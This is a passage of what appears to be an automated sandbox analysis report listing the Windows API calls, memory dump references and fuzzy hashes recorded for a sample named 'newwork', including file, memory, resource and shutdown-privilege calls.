                                                                                • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,020E8000,0040AA59,00000000), ref: 004076B3
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                APIs
                                                                                • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CharPrev
                                                                                • String ID:
                                                                                • API String ID: 122130370-0
                                                                                • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: SystemTime
                                                                                • String ID:
                                                                                • API String ID: 2656138-0
                                                                                • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
